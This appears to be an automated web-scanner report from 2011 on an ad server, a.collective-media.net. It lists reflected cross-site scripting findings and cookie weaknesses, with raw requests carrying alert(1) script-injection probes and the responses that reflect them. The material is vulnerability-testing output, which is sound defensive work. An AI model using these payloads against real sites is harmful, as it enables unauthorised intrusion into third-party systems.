1. Cross-site scripting (reflected)
1.1. http://a.collective-media.net/ad/cm.martini/ [REST URL parameter 1]
1.2. http://a.collective-media.net/adj/cm.martini/ [REST URL parameter 2]
1.4. http://a.collective-media.net/adj/cm.martini/ [sz parameter]
2. Cookie scoped to parent domain
3. Cookie without HttpOnly flag set
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /ad/cm.martini/ |
GET /ad7d1c0<script>alert(1)< Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.sailinganarchy Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZ |
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Content-Type: text/html Content-Length: 103 Date: Sat, 05 Mar 2011 23:43:23 GMT Connection: close Vary: Accept-Encoding unknown path /ad7d1c0<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/cm.martini/ |
GET /adj/cm.martini25991'-alert(1)- Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.sailinganarchy Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZ |
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 438 Date: Sat, 05 Mar 2011 23:43:16 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc-dal-sea; domain=collective-media var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var ifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/cm.martini/ |
GET /adj/cm.martini/;sz Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.sailinganarchy Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZ |
HTTP/1.1 200 OK Server: nginx/0.8.52 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 442 Date: Sat, 05 Mar 2011 23:43:15 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc-dal-sea; domain=collective-media var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var ifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/cm.martini/ |
GET /adj/cm.martini/;sz Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.sailinganarchy Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZ |
HTTP/1.1 200 OK Server: nginx/0.8.52 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 439 Date: Sat, 05 Mar 2011 23:43:13 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc-dal-sea; domain=collective-media var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var ifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/cm.martini/ |
GET /adj/cm.martini/;sz Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.sailinganarchy Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZ |
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 410 Date: Sat, 05 Mar 2011 23:43:12 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc-dal-sea; domain=collective-media var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var ifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/cm.martini/ |
GET /adj/cm.martini/;sz Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.sailinganarchy Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZ |
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 410 Date: Sat, 05 Mar 2011 23:43:12 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc-dal-sea; domain=collective-media var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var ifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |